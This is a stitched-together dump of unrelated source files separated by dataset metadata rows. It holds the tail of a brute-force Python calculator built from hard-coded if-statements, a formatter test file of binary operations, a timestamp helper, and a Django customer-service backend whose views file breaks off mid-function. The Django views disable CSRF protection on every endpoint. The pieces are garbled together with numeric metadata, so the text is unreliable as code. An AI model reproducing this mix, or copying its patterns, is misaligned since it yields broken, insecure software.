if number1 == 9 and operation == '*' and number2 == 0:
print("9*0 = 0")
if number1 == 9 and operation == '*' and number2 == 1:
print("9*1 = 9")
if number1 == 9 and operation == '*' and number2 == 2:
print("9*2 = 18")
if number1 == 9 and operation == '*' and number2 == 3:
print("9*3 = 27")
if number1 == 9 and operation == '*' and number2 == 4:
print("9*4 = 36")
if number1 == 9 and operation == '*' and number2 == 5:
print("9*5 = 45")
if number1 == 9 and operation == '*' and number2 == 6:
print("9*6 = 54")
if number1 == 9 and operation == '*' and number2 == 7:
print("9*7 = 63")
if number1 == 9 and operation == '*' and number2 == 8:
print("9*8 = 72")
if number1 == 9 and operation == '*' and number2 == 9:
print("9*9 = 81")
if number1 == 9 and operation == '*' and number2 == 10:
print("9*10 = 90")
if number1 == 10 and operation == '*' and number2 == 0:
print("10*0 = 0")
if number1 == 10 and operation == '*' and number2 == 1:
print("10*1 = 10")
if number1 == 10 and operation == '*' and number2 == 2:
print("10*2 = 20")
if number1 == 10 and operation == '*' and number2 == 3:
print("10*3 = 30")
if number1 == 10 and operation == '*' and number2 == 4:
print("10*4 = 40")
if number1 == 10 and operation == '*' and number2 == 5:
print("10*5 = 50")
if number1 == 10 and operation == '*' and number2 == 6:
print("10*6 = 60")
if number1 == 10 and operation == '*' and number2 == 7:
print("10*7 = 70")
if number1 == 10 and operation == '*' and number2 == 8:
print("10*8 = 80")
if number1 == 10 and operation == '*' and number2 == 9:
print("10*9 = 90")
if number1 == 10 and operation == '*' and number2 == 10:
print("10*10 = 100")
if number1 == 0 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 0 and operation == '/' and number2 == 1:
print("0/1 = 0.0")
if number1 == 0 and operation == '/' and number2 == 2:
print("0/2 = 0.0")
if number1 == 0 and operation == '/' and number2 == 3:
print("0/3 = 0.0")
if number1 == 0 and operation == '/' and number2 == 4:
print("0/4 = 0.0")
if number1 == 0 and operation == '/' and number2 == 5:
print("0/5 = 0.0")
if number1 == 0 and operation == '/' and number2 == 6:
print("0/6 = 0.0")
if number1 == 0 and operation == '/' and number2 == 7:
print("0/7 = 0.0")
if number1 == 0 and operation == '/' and number2 == 8:
print("0/8 = 0.0")
if number1 == 0 and operation == '/' and number2 == 9:
print("0/9 = 0.0")
if number1 == 0 and operation == '/' and number2 == 10:
print("0/10 = 0.0")
if number1 == 1 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 1 and operation == '/' and number2 == 1:
print("1/1 = 1.0")
if number1 == 1 and operation == '/' and number2 == 2:
print("1/2 = 0.5")
if number1 == 1 and operation == '/' and number2 == 3:
print("1/3 = 0.3333333333333333")
if number1 == 1 and operation == '/' and number2 == 4:
print("1/4 = 0.25")
if number1 == 1 and operation == '/' and number2 == 5:
print("1/5 = 0.2")
if number1 == 1 and operation == '/' and number2 == 6:
print("1/6 = 0.16666666666666666")
if number1 == 1 and operation == '/' and number2 == 7:
print("1/7 = 0.14285714285714285")
if number1 == 1 and operation == '/' and number2 == 8:
print("1/8 = 0.125")
if number1 == 1 and operation == '/' and number2 == 9:
print("1/9 = 0.1111111111111111")
if number1 == 1 and operation == '/' and number2 == 10:
print("1/10 = 0.1")
if number1 == 2 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 2 and operation == '/' and number2 == 1:
print("2/1 = 2.0")
if number1 == 2 and operation == '/' and number2 == 2:
print("2/2 = 1.0")
if number1 == 2 and operation == '/' and number2 == 3:
print("2/3 = 0.6666666666666666")
if number1 == 2 and operation == '/' and number2 == 4:
print("2/4 = 0.5")
if number1 == 2 and operation == '/' and number2 == 5:
print("2/5 = 0.4")
if number1 == 2 and operation == '/' and number2 == 6:
print("2/6 = 0.3333333333333333")
if number1 == 2 and operation == '/' and number2 == 7:
print("2/7 = 0.2857142857142857")
if number1 == 2 and operation == '/' and number2 == 8:
print("2/8 = 0.25")
if number1 == 2 and operation == '/' and number2 == 9:
print("2/9 = 0.2222222222222222")
if number1 == 2 and operation == '/' and number2 == 10:
print("2/10 = 0.2")
if number1 == 3 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 3 and operation == '/' and number2 == 1:
print("3/1 = 3.0")
if number1 == 3 and operation == '/' and number2 == 2:
print("3/2 = 1.5")
if number1 == 3 and operation == '/' and number2 == 3:
print("3/3 = 1.0")
if number1 == 3 and operation == '/' and number2 == 4:
print("3/4 = 0.75")
if number1 == 3 and operation == '/' and number2 == 5:
print("3/5 = 0.6")
if number1 == 3 and operation == '/' and number2 == 6:
print("3/6 = 0.5")
if number1 == 3 and operation == '/' and number2 == 7:
print("3/7 = 0.42857142857142855")
if number1 == 3 and operation == '/' and number2 == 8:
print("3/8 = 0.375")
if number1 == 3 and operation == '/' and number2 == 9:
print("3/9 = 0.3333333333333333")
if number1 == 3 and operation == '/' and number2 == 10:
print("3/10 = 0.3")
if number1 == 4 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 4 and operation == '/' and number2 == 1:
print("4/1 = 4.0")
if number1 == 4 and operation == '/' and number2 == 2:
print("4/2 = 2.0")
if number1 == 4 and operation == '/' and number2 == 3:
print("4/3 = 1.3333333333333333")
if number1 == 4 and operation == '/' and number2 == 4:
print("4/4 = 1.0")
if number1 == 4 and operation == '/' and number2 == 5:
print("4/5 = 0.8")
if number1 == 4 and operation == '/' and number2 == 6:
print("4/6 = 0.6666666666666666")
if number1 == 4 and operation == '/' and number2 == 7:
print("4/7 = 0.5714285714285714")
if number1 == 4 and operation == '/' and number2 == 8:
print("4/8 = 0.5")
if number1 == 4 and operation == '/' and number2 == 9:
print("4/9 = 0.4444444444444444")
if number1 == 4 and operation == '/' and number2 == 10:
print("4/10 = 0.4")
if number1 == 5 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 5 and operation == '/' and number2 == 1:
print("5/1 = 5.0")
if number1 == 5 and operation == '/' and number2 == 2:
print("5/2 = 2.5")
if number1 == 5 and operation == '/' and number2 == 3:
print("5/3 = 1.6666666666666667")
if number1 == 5 and operation == '/' and number2 == 4:
print("5/4 = 1.25")
if number1 == 5 and operation == '/' and number2 == 5:
print("5/5 = 1.0")
if number1 == 5 and operation == '/' and number2 == 6:
print("5/6 = 0.8333333333333334")
if number1 == 5 and operation == '/' and number2 == 7:
print("5/7 = 0.7142857142857143")
if number1 == 5 and operation == '/' and number2 == 8:
print("5/8 = 0.625")
if number1 == 5 and operation == '/' and number2 == 9:
print("5/9 = 0.5555555555555556")
if number1 == 5 and operation == '/' and number2 == 10:
print("5/10 = 0.5")
if number1 == 6 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 6 and operation == '/' and number2 == 1:
print("6/1 = 6.0")
if number1 == 6 and operation == '/' and number2 == 2:
print("6/2 = 3.0")
if number1 == 6 and operation == '/' and number2 == 3:
print("6/3 = 2.0")
if number1 == 6 and operation == '/' and number2 == 4:
print("6/4 = 1.5")
if number1 == 6 and operation == '/' and number2 == 5:
print("6/5 = 1.2")
if number1 == 6 and operation == '/' and number2 == 6:
print("6/6 = 1.0")
if number1 == 6 and operation == '/' and number2 == 7:
print("6/7 = 0.8571428571428571")
if number1 == 6 and operation == '/' and number2 == 8:
print("6/8 = 0.75")
if number1 == 6 and operation == '/' and number2 == 9:
print("6/9 = 0.6666666666666666")
if number1 == 6 and operation == '/' and number2 == 10:
print("6/10 = 0.6")
if number1 == 7 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 7 and operation == '/' and number2 == 1:
print("7/1 = 7.0")
if number1 == 7 and operation == '/' and number2 == 2:
print("7/2 = 3.5")
if number1 == 7 and operation == '/' and number2 == 3:
print("7/3 = 2.3333333333333335")
if number1 == 7 and operation == '/' and number2 == 4:
print("7/4 = 1.75")
if number1 == 7 and operation == '/' and number2 == 5:
print("7/5 = 1.4")
if number1 == 7 and operation == '/' and number2 == 6:
print("7/6 = 1.1666666666666667")
if number1 == 7 and operation == '/' and number2 == 7:
print("7/7 = 1.0")
if number1 == 7 and operation == '/' and number2 == 8:
print("7/8 = 0.875")
if number1 == 7 and operation == '/' and number2 == 9:
print("7/9 = 0.7777777777777778")
if number1 == 7 and operation == '/' and number2 == 10:
print("7/10 = 0.7")
if number1 == 8 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 8 and operation == '/' and number2 == 1:
print("8/1 = 8.0")
if number1 == 8 and operation == '/' and number2 == 2:
print("8/2 = 4.0")
if number1 == 8 and operation == '/' and number2 == 3:
print("8/3 = 2.6666666666666665")
if number1 == 8 and operation == '/' and number2 == 4:
print("8/4 = 2.0")
if number1 == 8 and operation == '/' and number2 == 5:
print("8/5 = 1.6")
if number1 == 8 and operation == '/' and number2 == 6:
print("8/6 = 1.3333333333333333")
if number1 == 8 and operation == '/' and number2 == 7:
print("8/7 = 1.1428571428571428")
if number1 == 8 and operation == '/' and number2 == 8:
print("8/8 = 1.0")
if number1 == 8 and operation == '/' and number2 == 9:
print("8/9 = 0.8888888888888888")
if number1 == 8 and operation == '/' and number2 == 10:
print("8/10 = 0.8")
if number1 == 9 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 9 and operation == '/' and number2 == 1:
print("9/1 = 9.0")
if number1 == 9 and operation == '/' and number2 == 2:
print("9/2 = 4.5")
if number1 == 9 and operation == '/' and number2 == 3:
print("9/3 = 3.0")
if number1 == 9 and operation == '/' and number2 == 4:
print("9/4 = 2.25")
if number1 == 9 and operation == '/' and number2 == 5:
print("9/5 = 1.8")
if number1 == 9 and operation == '/' and number2 == 6:
print("9/6 = 1.5")
if number1 == 9 and operation == '/' and number2 == 7:
print("9/7 = 1.2857142857142858")
if number1 == 9 and operation == '/' and number2 == 8:
print("9/8 = 1.125")
if number1 == 9 and operation == '/' and number2 == 9:
print("9/9 = 1.0")
if number1 == 9 and operation == '/' and number2 == 10:
print("9/10 = 0.9")
if number1 == 10 and operation == '/' and number2 == 0:
print("Cannot divide by Zero.")
if number1 == 10 and operation == '/' and number2 == 1:
print("10/1 = 10.0")
if number1 == 10 and operation == '/' and number2 == 2:
print("10/2 = 5.0")
if number1 == 10 and operation == '/' and number2 == 3:
print("10/3 = 3.3333333333333335")
if number1 == 10 and operation == '/' and number2 == 4:
print("10/4 = 2.5")
if number1 == 10 and operation == '/' and number2 == 5:
print("10/5 = 2.0")
if number1 == 10 and operation == '/' and number2 == 6:
print("10/6 = 1.6666666666666667")
if number1 == 10 and operation == '/' and number2 == 7:
print("10/7 = 1.4285714285714286")
if number1 == 10 and operation == '/' and number2 == 8:
print("10/8 = 1.25")
if number1 == 10 and operation == '/' and number2 == 9:
print("10/9 = 1.1111111111111112")
if number1 == 10 and operation == '/' and number2 == 10:
print("10/10 = 1.0")
print("\nCheckout the original code by AceLewis on GitHub.\nHave a good day!") | 37.4572 | 78 | 0.573625 | 6,006 | 37,195 | 3.552115 | 0.021812 | 0.204181 | 0.340302 | 0.499109 | 0.944127 | 0.941642 | 0.941642 | 0.941642 | 0.931471 | 0.926362 | 0 | 0.146408 | 0.21148 | 37,195 | 993 | 78 | 37.4572 | 0.580995 | 0.003925 | 0 | 0.011202 | 0 | 0 | 0.1415 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.001018 | 0 | 0 | 0 | 0.496945 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 10 |
2e101c1e72dadd380668c7593c41a9ce8905f65b | 506 | py | Python | tests/test_binop/output.py | waadnakhleh/pythonformatter | 5f622986aa4e2fcdf03e49041a7ddc14e66d1a2f | [
"MIT"
] | null | null | null | tests/test_binop/output.py | waadnakhleh/pythonformatter | 5f622986aa4e2fcdf03e49041a7ddc14e66d1a2f | [
"MIT"
] | 19 | 2020-12-28T17:17:12.000Z | 2021-12-22T20:44:42.000Z | tests/test_binop/output.py | waadnakhleh/pythonformatter | 5f622986aa4e2fcdf03e49041a7ddc14e66d1a2f | [
"MIT"
] | 1 | 2021-03-20T17:41:14.000Z | 2021-03-20T17:41:14.000Z | 1 + 2
a - b
c * d
mat @ mat
di / di
1221203 % 2
2 ** 2
2 << 2
2 >> 2
15 | 0
15 & 1
1 ^ 0
16 // 2.5
ab = (
12431241241
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
)
a = 10
ab = (
12431241241
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
+ 122412
+ 21243
+ 342
)
| 9.921569 | 15 | 0.416996 | 63 | 506 | 3.349206 | 0.301587 | 0.521327 | 0.663507 | 0.758294 | 0.819905 | 0.819905 | 0.78673 | 0.78673 | 0.78673 | 0.78673 | 0 | 0.721805 | 0.474308 | 506 | 50 | 16 | 10.12 | 0.071429 | 0 | 0 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
2e175e912d7a4d9d5b96526b90bee014408477b9 | 150 | py | Python | pdfmb/utils.py | 1081/pdfmb | 50151a7bb6e02d3af2b2021bac567565d69c3fbc | [
"MIT"
] | null | null | null | pdfmb/utils.py | 1081/pdfmb | 50151a7bb6e02d3af2b2021bac567565d69c3fbc | [
"MIT"
] | null | null | null | pdfmb/utils.py | 1081/pdfmb | 50151a7bb6e02d3af2b2021bac567565d69c3fbc | [
"MIT"
] | null | null | null | import time
def timestamp_file():
return time.strftime("%Y-%m-%d %H%M%S")
def timestamp_outline():
return time.strftime("%Y-%m-%d %H:%M")
| 15 | 43 | 0.626667 | 25 | 150 | 3.68 | 0.52 | 0.26087 | 0.391304 | 0.413043 | 0.5 | 0.5 | 0.5 | 0.5 | 0 | 0 | 0 | 0 | 0.16 | 150 | 9 | 44 | 16.666667 | 0.730159 | 0 | 0 | 0 | 0 | 0 | 0.193333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
2e34674c2eeffcb220aa3a3ed32915cde5159d41 | 34,509 | py | Python | backend/views.py | romic-kid/project-kfsystem | 3ed63c5c063493dc0dd7e0c4b62ba7481bf63311 | [
"BSD-3-Clause"
] | 2 | 2018-03-22T08:42:41.000Z | 2018-07-03T09:22:28.000Z | backend/views.py | romic-kid/project-kfsystem | 3ed63c5c063493dc0dd7e0c4b62ba7481bf63311 | [
"BSD-3-Clause"
] | 2 | 2019-04-25T02:10:10.000Z | 2022-03-02T01:11:28.000Z | backend/views.py | romic-kid/project-kfsystem | 3ed63c5c063493dc0dd7e0c4b62ba7481bf63311 | [
"BSD-3-Clause"
] | 1 | 2019-03-14T03:13:05.000Z | 2019-03-14T03:13:05.000Z | from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from .models import Admin, CustomerService, ChattingLog, SerialNumber, EnterpriseDisplayInfo, RobotInfo, BigImageLog, SmallImageLog
from .serializers import AdminSerializer, CustomerServiceSerializer, CustomerServiceCreateSerializer, ChattingLogSerializer, SerialNumberSerializer, EnterpriseDisplayInfoSerializer, RobotInfoSerializer, BigImageLogSerializer, SmallImageLogSerializer
from datetime import datetime, timedelta
from .views_helper_functions import *
from .views_check_functions import *
from .robot import *
from .robot_basic import *
from django.utils import timezone
import os, base64
@csrf_exempt
def admin_create(request):
if request.method == 'POST':
# Admin: email nickname password SerialNumber: serials
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_create_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive['password'] = admin_generate_password(json_receive['email'], json_receive['password'])
json_receive['web_url'] = "192.168.55.33:8000/web/" + json_receive['nickname'] + '/'
json_receive['widget_url'] = "192.168.55.33:8000/widget/" + json_receive['nickname'] + '/'
json_receive['mobile_url'] = "192.168.55.33:8000/mobile/" + json_receive['nickname'] + '/'
json_receive['communication_key'] = admin_generate_communication_key(json_receive['email'])
json_receive['vid'] = admin_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
serializer = AdminSerializer(data=json_receive)
if serializer.is_valid():
serializer.save()
instance = Admin.objects.get(email=json_receive['email'])
CustomerService.objects.create(email=json_receive['nickname']+'@robot.com', enterprise=instance, nickname=json_receive['nickname']+'&Robot', password='robot_password', is_register=True, is_online=True, connection_num=0, vid='robot_vid')
sn_mark_used(json_receive['serials'])
return HttpResponse('OK', status=200)
return HttpResponse('ERROR, invalid data in serializer.', status=200)
@csrf_exempt
def admin_login(request):
if request.method == 'POST':
# Admin: email password
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_login_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
sha512_final_password = admin_generate_password(json_receive['email'], json_receive['password'])
if admin_is_valid_by_email_password(json_receive['email'], sha512_final_password) == True:
# cs_sessions_del(request)
request.session['a_email'] = json_receive['email']
return HttpResponse('OK', status=200)
else:
return HttpResponse("ERROR, wrong email or password.", status=200)
@csrf_exempt
def admin_reset_password(request):
if request.method == 'POST':
# Admin: password newpassword
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_reset_password_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive['email'] = request.session['a_email']
sha512_old_final_password = admin_generate_password(json_receive['email'], json_receive['password'])
if admin_is_valid_by_email_password(json_receive['email'], sha512_old_final_password) == False:
return HttpResponse("ERROR, wrong email or password.", status=200)
sha512_new_final_password = admin_generate_password(json_receive['email'], json_receive['newpassword'])
instance = Admin.objects.get(email=json_receive['email'], password=sha512_old_final_password)
json_receive['password'] = sha512_new_final_password
serializer = AdminSerializer(instance, data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def admin_forget_password_email_request(request):
if request.method == 'POST':
# Admin: email
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_forget_password_email_request_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
instance = Admin.objects.get(email=json_receive['email'])
json_receive['vid'] = admin_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
serializer = AdminSerializer(instance, data=json_receive)
content = 'Dear ' + instance.nickname + ':\n' + 'You have submitted a password retrieval, Please click the following links to finish the operation.\n' + 'http://192.168.55.33:8000/en_password_retrieval/?email=' + json_receive['email'] + '&key=' + json_receive['vid']
if serializer.is_valid():
serializer.save()
admin_send_email_forget_password(json_receive['email'], content)
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def admin_forget_password_check_vid(request):
if request.method == 'POST':
# Admin: email vid
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_forget_password_check_vid_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive['vid'] = admin_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
instance = Admin.objects.get(email=json_receive['email'])
serializer = AdminSerializer(instance, data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse(json_receive['vid'], status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def admin_forget_password_save_data(request):
if request.method == 'POST':
# Admin: email newpassword vid
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_forget_password_save_data_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
instance = Admin.objects.get(email=json_receive['email'])
sha512_new_final_password = admin_generate_password(json_receive['email'], json_receive['newpassword'])
json_receive['password'] = sha512_new_final_password
json_receive['vid'] = admin_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
serializer = AdminSerializer(instance, data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def admin_show_communication_key(request):
if request.method == 'POST':
# no json
is_correct, error_message = admin_show_communication_key_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['a_email']
communication_key = admin_get_communication_key(data_email)
json_send = {'communication_key': communication_key}
return JsonResponse(json_send, status=200)
@csrf_exempt
def admin_reset_communication_key(request):
if request.method == 'POST':
# no json
is_correct, error_message = admin_reset_communication_key_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive = dict()
json_receive['email'] = request.session['a_email']
instance = Admin.objects.get(email=json_receive['email'])
json_receive['communication_key'] = admin_generate_communication_key(json_receive['email'])
serializer = AdminSerializer(instance, data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse('ERROR, invalid data in serializer.', status=200)
@csrf_exempt
def admin_show_cs_status(request):
if request.method == 'POST':
# no json
is_correct, error_message = admin_show_cs_status_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['a_email']
instance_admin = Admin.objects.get(email=data_email)
instance_customerservice = CustomerService.objects.filter(enterprise=instance_admin.id)
json_send = list()
for i in instance_customerservice:
json_send.append({'email': i.email, 'is_register': i.is_register, 'is_online': i.is_online, 'connection_num': i.connection_num, 'nickname': i.nickname})
return JsonResponse(json_send, safe=False, status=200)
@csrf_exempt
def admin_delete_cs(request):
if request.method == 'POST':
# CustomerService: email:
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_delete_cs_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
instance_cs = CustomerService.objects.get(email=json_receive['email'])
instance_cs.delete()
return HttpResponse('OK', status=200)
@csrf_exempt
def admin_show_user_status(request):
if request.method == 'POST':
# no json
is_correct, error_message = admin_show_user_status_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['a_email']
instance = Admin.objects.get(email=data_email)
json_send = {'email': instance.email, 'nickname': instance.nickname}
return JsonResponse(json_send, status=200)
@csrf_exempt
def admin_show_url_status(request):
if request.method == 'POST':
# no json
is_correct, error_message = admin_show_url_status_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['a_email']
instance = Admin.objects.get(email=data_email)
json_send = {'web_url':instance.web_url, 'widget_url':instance.widget_url, 'mobile_url':instance.mobile_url}
return JsonResponse(json_send, status=200)
@csrf_exempt
def admin_display_info_create(request):
if request.method == 'POST':
# EnterpriseInfoType: name comment
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_display_info_create_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['a_email']
instance_admin = Admin.objects.get(email=data_email)
json_receive['enterprise'] = instance_admin.id
serializer = EnterpriseDisplayInfoSerializer(data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse('ERROR, invalid data in serializer.', status=200)
@csrf_exempt
def admin_display_info_delete(request):
if request.method == 'POST':
# EnterpriseInfoType: name
json_receive = JSONParser().parse(request)
is_correct, error_message = admin_display_info_delete_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
data_email = request.session['a_email']
instance_admin = Admin.objects.get(email=data_email)
instance_displayinfo = EnterpriseDisplayInfo.objects.filter(enterprise=instance_admin.id, name=json_receive['name'])
instance_displayinfo.delete()
return HttpResponse('OK', status=200)
@csrf_exempt
def admin_display_info_show(request):
if request.method == 'POST':
# no json
is_correct, error_message = admin_display_info_show_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
admin_email = request.session['a_email']
instance_admin = Admin.objects.get(email=admin_email)
instance_displayinfo = EnterpriseDisplayInfo.objects.filter(enterprise=instance_admin.id)
json_send = list()
for i in instance_displayinfo:
json_send.append({'name': i.name, 'comment': i.comment})
return JsonResponse(json_send, safe=False, status=200)
@csrf_exempt
def admin_logout(request):
if request.method == 'POST':
# no json
is_correct, error_message = admin_logout_check(request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
del request.session['a_email']
return HttpResponse('OK', status=200)
@csrf_exempt
def customerservice_create(request):
if request.method == 'POST':
# CustomerService: email
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_create_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
cs_reset_create(json_receive['email'])
admin_email = request.session['a_email']
instance_admin = Admin.objects.get(email=admin_email)
json_receive['nickname'] = json_receive['email']
json_receive['enterprise'] = instance_admin.id
json_receive['vid'] = cs_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
serializer = CustomerServiceCreateSerializer(data=json_receive)
content = 'Dear customerservice' + ':\n' + 'Please click the following links to finish the operation.\n' + 'http://192.168.55.33:8000/se_folders/?email=' + json_receive['email'] + '&key=' + json_receive['vid']
if serializer.is_valid():
serializer.save()
cs_send_email_create_account(json_receive['email'], content)
return HttpResponse('OK', status=200)
return HttpResponse('ERROR, invalid data in serializer.', status=200)
@csrf_exempt
def customerservice_set_profile(request):
if request.method == 'POST':
# CustomerService: email password nickname vid
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_set_profile_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive['password'] = cs_generate_password(json_receive['email'], json_receive['password'])
json_receive['vid'] = cs_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
json_receive['is_register'] = True
instance = CustomerService.objects.get(email=json_receive['email'])
serializer = CustomerServiceSerializer(instance, data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse('ERROR, invalid data in serializer.', status=200)
@csrf_exempt
def customerservice_set_profile_check_vid(request):
if request.method == 'POST':
# CustomerService: email vid
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_set_profile_check_vid_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive['vid'] = cs_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
instance = CustomerService.objects.get(email=json_receive['email'])
serializer = CustomerServiceSerializer(instance, data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse(json_receive['vid'], status=200)
return HttpResponse('ERROR, invalid data in serializer.', status=200)
@csrf_exempt
def customerservice_login(request):
if request.method == 'POST':
# CustomerService: email password
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_login_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
sha512_final_password = cs_generate_password(json_receive['email'], json_receive['password'])
if cs_is_valid_by_email_password(json_receive['email'], sha512_final_password) == True:
# admin_sessions_del(request)
request.session['c_email'] = json_receive['email']
instance_cs = CustomerService.objects.get(email=json_receive['email'])
instance_cs.is_online = True
instance_cs.save()
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, wrong email or password.", status=200)
@csrf_exempt
def customerservice_reset_password(request):
if request.method == 'POST':
# CustomerService: password newpassword
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_reset_password_check(json_receive, request)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive['email'] = request.session['c_email']
sha512_old_final_password = cs_generate_password(json_receive['email'], json_receive['password'])
if cs_is_valid_by_email_password(json_receive['email'], sha512_old_final_password) == False:
return HttpResponse("ERROR, wrong email or password.", status=200)
sha512_new_final_password = cs_generate_password(json_receive['email'], json_receive['newpassword'])
instance = CustomerService.objects.get(email=json_receive['email'], password=sha512_old_final_password)
json_receive['password'] = sha512_new_final_password
serializer = CustomerServiceSerializer(instance, data=json_receive)
if serializer.is_valid():
serializer.save()
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def customerservice_forget_password_email_request(request):
if request.method == 'POST':
# CustomerService: email
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_forget_password_email_request_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
instance = CustomerService.objects.get(email=json_receive['email'])
json_receive['vid'] = cs_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
serializer = CustomerServiceSerializer(instance, data=json_receive)
content = 'Dear ' + instance.nickname + ':\n' + 'You have submitted a password retrieval, Please click the following links to finish the operation.\n' + 'http://192.168.55.33:8000/se_password_retrieval/?email=' + json_receive['email'] + '&key=' + json_receive['vid']
if serializer.is_valid():
serializer.save()
cs_send_email_forget_password(json_receive['email'], content)
return HttpResponse('OK', status=200)
return HttpResponse("ERROR, invalid data in serializer.", status=200)
@csrf_exempt
def customerservice_forget_password_check_vid(request):
if request.method == 'POST':
# CustomerService: email vid
json_receive = JSONParser().parse(request)
is_correct, error_message = customerservice_forget_password_check_vid_check(json_receive)
if is_correct == 0:
return HttpResponse(error_message, status=200)
json_receive['vid'] = cs_generate_vid(json_receive['email'])
json_receive['vid_createtime'] = timezone.now()
instance = CustomerService.objects.get(email=json_receive['email'])
serializer = CustomerServiceSerializer(instance, data=json_receive)
